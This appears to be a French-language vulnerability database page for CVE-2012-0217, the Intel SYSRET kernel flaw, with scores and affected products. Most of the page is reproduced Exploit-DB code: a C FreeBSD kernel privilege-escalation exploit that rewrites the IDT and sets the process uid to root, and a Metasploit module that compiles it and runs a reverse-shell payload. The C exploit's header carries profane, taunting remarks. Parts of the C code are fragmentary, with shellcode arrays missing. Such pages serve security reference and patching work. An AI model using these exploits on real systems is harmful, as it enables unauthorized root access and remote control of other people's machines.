Faiblesses connexes
Nom de la faiblesse |
Source |
CWE-119 |
Improper Restriction of Operations within the Bounds of a Memory Buffer The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data. |
Métriques |
Score |
Gravité |
CVSS Vecteur |
Source |
V2 |
7.2 |
AV:L/AC:L/Au:N/C:C/I:C/A:C |
[email protected] |
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 28718
Date de publication : 2013-10-03 22h00 +00:00
Auteur : CurcolHekerLink
EDB Vérifié : Yes
* FreeBSD 9.0 Intel SYSRET Kernel Privilege Escalation exploit
* Author by CurcolHekerLink
* This exploit based on open source project, I can make it open source too. Right?
* If you blaming me for open sourcing this exploit, you can fuck your mom. Free of charge :)
* Credits to KEPEDEAN Corp, Barisan Sakit Hati, ora iso sepaying meneh hekerlink,
* Kismin perogeremer cyber team, petboylittledick, 1337 Curhat Crew and others at #MamaDedehEliteCurhatTeam
* if you would like next private exploit leakage, just mention @MamahhDedeh
* Some people may feel harmed when we release this exploit :))
* p.s: Met idul Adha ya besok, saatnya potong leher dewa lo... eh maksudnya potong Sapisisasi :))
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>
#include <string.h>
#include <sys/mman.h>
#include <machine/cpufunc.h>
#define _WANT_UCRED
#include <sys/proc.h>
#include <machine/segments.h>
#include <sys/param.h>
#include <sys/linker.h>
#define TRIGGERSIZE 20
#define BOUNCESIZE 18
uintptr_t Xdivp, Xdbgp, Xbptp, Xoflp, Xbndp, Xillp, Xdnap, Xfpusegmp, Xtssp, Xmissingp, Xstkp, Xprotp, Xpagep, Xfpup, Xalignp, Xmchkp, Xxmmp;
struct gate_descriptor * sidt()
struct region_descriptor idt;
asm ("sidt %0": "=m"(idt));
return (struct gate_descriptor*)idt.rd_base;
u_long matchsym(char *symname)
struct kld_sym_lookup ksym;
ksym.version = sizeof (ksym);
ksym.symname = symname;
if (kldsym(0, KLDSYM_LOOKUP, &ksym) < 0) {
return ksym.symvalue;
void setidt(struct gate_descriptor *idt, int idx, uintptr_t func, int typ, int dpl, int ist)
struct gate_descriptor *ip;
ip = idt + idx;
ip->gd_looffset = func;
ip->gd_selector = GSEL(GCODE_SEL, SEL_KPL);
ip->gd_ist = ist;
ip->gd_xx = 0;
ip->gd_type = typ;
ip->gd_dpl = dpl;
ip->gd_p = 1;
ip->gd_hioffset = func>>16;
void payload()
printf("[+] Woohoo!!!\n");
void resetidt()
struct thread *td;
struct ucred *cred;
struct gate_descriptor *idt = sidt();
setidt(idt, IDT_DE, Xdivp, SDT_SYSIGT, SEL_KPL, 0);
setidt(idt, IDT_DB, Xdbgp, SDT_SYSIGT, SEL_KPL, 0);
setidt(idt, IDT_BP, Xbptp, SDT_SYSIGT, SEL_KPL, 0);
setidt(idt, IDT_OF, Xoflp, SDT_SYSIGT, SEL_KPL, 0);
setidt(idt, IDT_BR, Xbndp, SDT_SYSIGT, SEL_KPL, 0);
setidt(idt, IDT_UD, Xillp, SDT_SYSIGT, SEL_KPL, 0);
setidt(idt, IDT_NM, Xdnap, SDT_SYSIGT, SEL_KPL, 0);
setidt(idt, IDT_FPUGP, Xfpusegmp, SDT_SYSIGT, SEL_KPL, 0);
setidt(idt, IDT_TS, Xtssp, SDT_SYSIGT, SEL_KPL, 0);
setidt(idt, IDT_NP, Xmissingp, SDT_SYSIGT, SEL_KPL, 0);
setidt(idt, IDT_SS, Xstkp, SDT_SYSIGT, SEL_KPL, 0);
setidt(idt, IDT_GP, Xprotp, SDT_SYSIGT, SEL_KPL, 0);
setidt(idt, IDT_PF, Xpagep, SDT_SYSIGT, SEL_KPL, 0);
setidt(idt, IDT_MF, Xfpup, SDT_SYSIGT, SEL_KPL, 0);
setidt(idt, IDT_AC, Xalignp, SDT_SYSIGT, SEL_KPL, 0);
setidt(idt, IDT_MC, Xmchkp, SDT_SYSIGT, SEL_KPL, 0);
setidt(idt, IDT_XF, Xxmmp, SDT_SYSIGT, SEL_KPL, 0);
asm ("mov %%gs:0, %0" : "=r"(td));
cred = td->td_proc->p_ucred;
cred->cr_uid = cred->cr_ruid = cred->cr_rgid = 0;
cred->cr_groups[0] = 0;
asm ("swapgs; sysretq;" :: "c"(payload));
void resolving()
Xdivp = (uintptr_t)matchsym("Xdiv");
Xdbgp = (uintptr_t)matchsym("Xdbg");
Xbptp = (uintptr_t)matchsym("Xbpt");
Xoflp = (uintptr_t)matchsym("Xofl");
Xbndp = (uintptr_t)matchsym("Xbnd");
Xillp = (uintptr_t)matchsym("Xill");
Xdnap = (uintptr_t)matchsym("Xdna");
Xfpusegmp = (uintptr_t)matchsym("Xfpusegm");
Xtssp = (uintptr_t)matchsym("Xtss");
Xmissingp = (uintptr_t)matchsym("Xmissing");
Xstkp = (uintptr_t)matchsym("Xstk");
Xprotp = (uintptr_t)matchsym("Xprot");
Xpagep = (uintptr_t)matchsym("Xpage");
Xfpup = (uintptr_t)matchsym("Xfpu");
Xalignp = (uintptr_t)matchsym("Xalign");
Xmchkp = (uintptr_t)matchsym("Xmchk");
Xxmmp = (uintptr_t)matchsym("Xxmm");
void trigger()
printf("[+] Crotz...\n");
uint64_t pagesize = getpagesize();
uint8_t * mappedarea = (uint8_t*)((1ULL << 47) - pagesize);
mappedarea = mmap(mappedarea, pagesize, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0);
if (mappedarea == MAP_FAILED) {
perror("mmap (trigger)");
char triggerpayload[] =
uint8_t * offset_addr = mappedarea + pagesize - TRIGGERSIZE;
memcpy(offset_addr, triggerpayload, TRIGGERSIZE);
*(uint64_t*)(offset_addr + 10) = (uint64_t)(((uint8_t*)&sidt()[14]) + 10 * 8);
printf("[+] Crotz...\n");
char bouncepayload[] =
uint8_t * bouncer = (uint8_t*)(0x900000000 | (Xpagep & 0xFFFFFFFF));
size_t bouncer_allocsize = pagesize;
if ((uint8_t*)((uint64_t)bouncer & ~(pagesize-1)) + pagesize < bouncer + BOUNCESIZE)
bouncer_allocsize += pagesize;
if (mmap((void*)((uint64_t)bouncer & ~(pagesize-1)), bouncer_allocsize, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0) == MAP_FAILED)
perror("mmap (bouncer)");
memcpy(bouncer, bouncepayload, BOUNCESIZE);
*(uint64_t*)(bouncer + 8) = (uint64_t)resetidt;
((void (*)())offset_addr)();
int main(int argc, char *argv[])
printf("[+] SYSRET FUCKUP!!\n");
printf("[+] Start Engine...\n");
printf("[+] Crotz...\n");
return 0;
Exploit Database EDB-ID : 46508
Date de publication : 2019-03-06 23h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
class MetasploitModule < Msf::Exploit::Local
Rank = GreatRanking
include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
'Name' => 'FreeBSD Intel SYSRET Privilege Escalation',
'Description' => %q{
This module exploits a vulnerability in the FreeBSD kernel,
when running on 64-bit Intel processors.
By design, 64-bit processors following the X86-64 specification will
trigger a general protection fault (GPF) when executing a SYSRET
instruction with a non-canonical address in the RCX register.
However, Intel processors check for a non-canonical address prior to
dropping privileges, causing a GPF in privileged mode. As a result,
the current userland RSP stack pointer is restored and executed,
resulting in privileged code execution.
This module has been tested successfully on:
FreeBSD 8.3-RELEASE (amd64); and
FreeBSD 9.0-RELEASE (amd64).
'License' => MSF_LICENSE,
'Author' =>
'Rafal Wojtczuk', # Discovery
'John Baldwin', # Discovery
'iZsh', # Exploit
'bcoles' # Metasploit
'DisclosureDate' => '2012-06-12',
'Platform' => ['bsd'],
'Arch' => [ARCH_X64],
'SessionTypes' => ['shell'],
'References' =>
['BID', '53856'],
['CVE', '2012-0217'],
['EDB', '28718'],
['PACKETSTORM', '113584'],
['URL', 'https://www.freebsd.org/security/patches/SA-12:04/sysret.patch'],
['URL', 'https://blog.xenproject.org/2012/06/13/the-intel-sysret-privilege-escalation/'],
['URL', 'https://github.com/iZsh/exploits/blob/master/stash/CVE-2012-0217-sysret/CVE-2012-0217-sysret_FreeBSD.c'],
['URL', 'https://fail0verflow.com/blog/2012/cve-2012-0217-intel-sysret-freebsd/'],
['URL', 'http://security.freebsd.org/advisories/FreeBSD-SA-12:04.sysret.asc'],
['URL', 'https://www.slideshare.net/nkslides/exploiting-the-linux-kernel-via-intels-sysret-implementation']
'Targets' =>
['Automatic', {}]
'DefaultOptions' => { 'PAYLOAD' => 'bsd/x64/shell_reverse_tcp' },
'DefaultTarget' => 0))
register_advanced_options [
OptBool.new('ForceExploit', [false, 'Override check result', false]),
OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
def base_dir
def upload(path, data)
print_status "Writing '#{path}' (#{data.size} bytes) ..."
rm_f path
write_file path, data
register_file_for_cleanup path
def upload_and_chmodx(path, data)
upload path, data
cmd_exec "chmod +x '#{path}'"
def upload_and_compile(path, data, gcc_args='')
upload "#{path}.c", data
gcc_cmd = "gcc -o #{path} #{path}.c"
if session.type.eql? 'shell'
gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}"
output = cmd_exec gcc_cmd
unless output.blank?
print_error output
fail_with Failure::Unknown, "#{path}.c failed to compile"
register_file_for_cleanup path
chmod path
def exploit_data(file)
::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2012-0217', file)
def is_root?
(cmd_exec('id -u').to_s.gsub(/[^\d]/, '') == '0')
def strip_comments(c_code)
c_code.gsub(%r{/\*.*?\*/}m, '').gsub(%r{^\s*//.*$}, '')
def check
kernel_release = cmd_exec('uname -r').to_s
unless kernel_release =~ /^(8\.3|9\.0)-RELEASE/
vprint_error "FreeBSD version #{kernel_release} is not vulnerable"
return Exploit::CheckCode::Safe
vprint_good "FreeBSD version #{kernel_release} appears vulnerable"
arch = cmd_exec('uname -m').to_s
unless arch.include? '64'
vprint_error "System architecture #{arch} is not supported"
return CheckCode::Safe
vprint_good "System architecture #{arch} is supported"
hw_model = cmd_exec('/sbin/sysctl hw.model').to_s
unless hw_model.downcase.include? 'intel'
vprint_error "#{hw_model} is not vulnerable"
return CheckCode::Safe
vprint_good "#{hw_model} is vulnerable"
def exploit
unless check == CheckCode::Appears
unless datastore['ForceExploit']
fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
print_warning 'Target does not appear to be vulnerable'
if is_root?
unless datastore['ForceExploit']
fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
unless writable? base_dir
fail_with Failure::BadConfig, "#{base_dir} is not writable"
# Upload and compile exploit executable
executable_name = ".#{rand_text_alphanumeric 5..10}"
executable_path = "#{base_dir}/#{executable_name}"
upload_and_compile executable_path, strip_comments(exploit_data('sysret.c')), '-Wall'
# Upload payload executable
payload_path = "#{base_dir}/.#{rand_text_alphanumeric 5..10}"
upload_and_chmodx payload_path, generate_payload_exe
# Launch exploit
print_status 'Launching exploit...'
output = cmd_exec executable_path
output.each_line { |line| vprint_status line.chomp }
unless is_root?
fail_with Failure::Unknown, 'Exploitation failed'
print_good "Success! Executing payload..."
cmd_exec payload_path
Exploit Database EDB-ID : 20861
Date de publication : 2012-08-26 22h00 +00:00
Auteur : Shahriyar Jalayeri
EDB Vérifié : Yes
Source: http://packetstormsecurity.org/files/115908/sysret.rar
This is proof of concept code that demonstrates the Microsoft Windows kernel (Intel/x64) SYSRET vulnerability as described in MS12-042. The shellcode disables code signing and will grant NT SYSTEM privileges to a specified application or already running process.
Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20861.rar
Products Mentioned
Configuraton 0
Freebsd>>Freebsd >> Version To (including) 9.0
Configuraton 0
Illumos>>Illumos >> Version To (including) r13723
Configuraton 0
Joyent>>Smartos >> Version To (including) 20120614
Configuraton 0
Xen>>Xen >> Version To (including) 4.1.2
Xen>>Xen >> Version 4.0.0
Xen>>Xen >> Version 4.0.1
Xen>>Xen >> Version 4.0.2
Xen>>Xen >> Version 4.0.3
Xen>>Xen >> Version 4.0.4
Xen>>Xen >> Version 4.1.0
Xen>>Xen >> Version 4.1.1
Configuraton 0
Microsoft>>Windows_7 >> Version *
Microsoft>>Windows_7 >> Version *
Microsoft>>Windows_server_2003 >> Version *
Microsoft>>Windows_server_2008 >> Version r2
Microsoft>>Windows_xp >> Version *
Configuraton 0
Citrix>>Xenserver >> Version To (including) 6.0.2
Citrix>>Xenserver >> Version 6.0
Configuraton 0
Netbsd>>Netbsd >> Version To (including) 6.0
Configuraton 0
Sun>>Sunos >> Version To (including) 5.11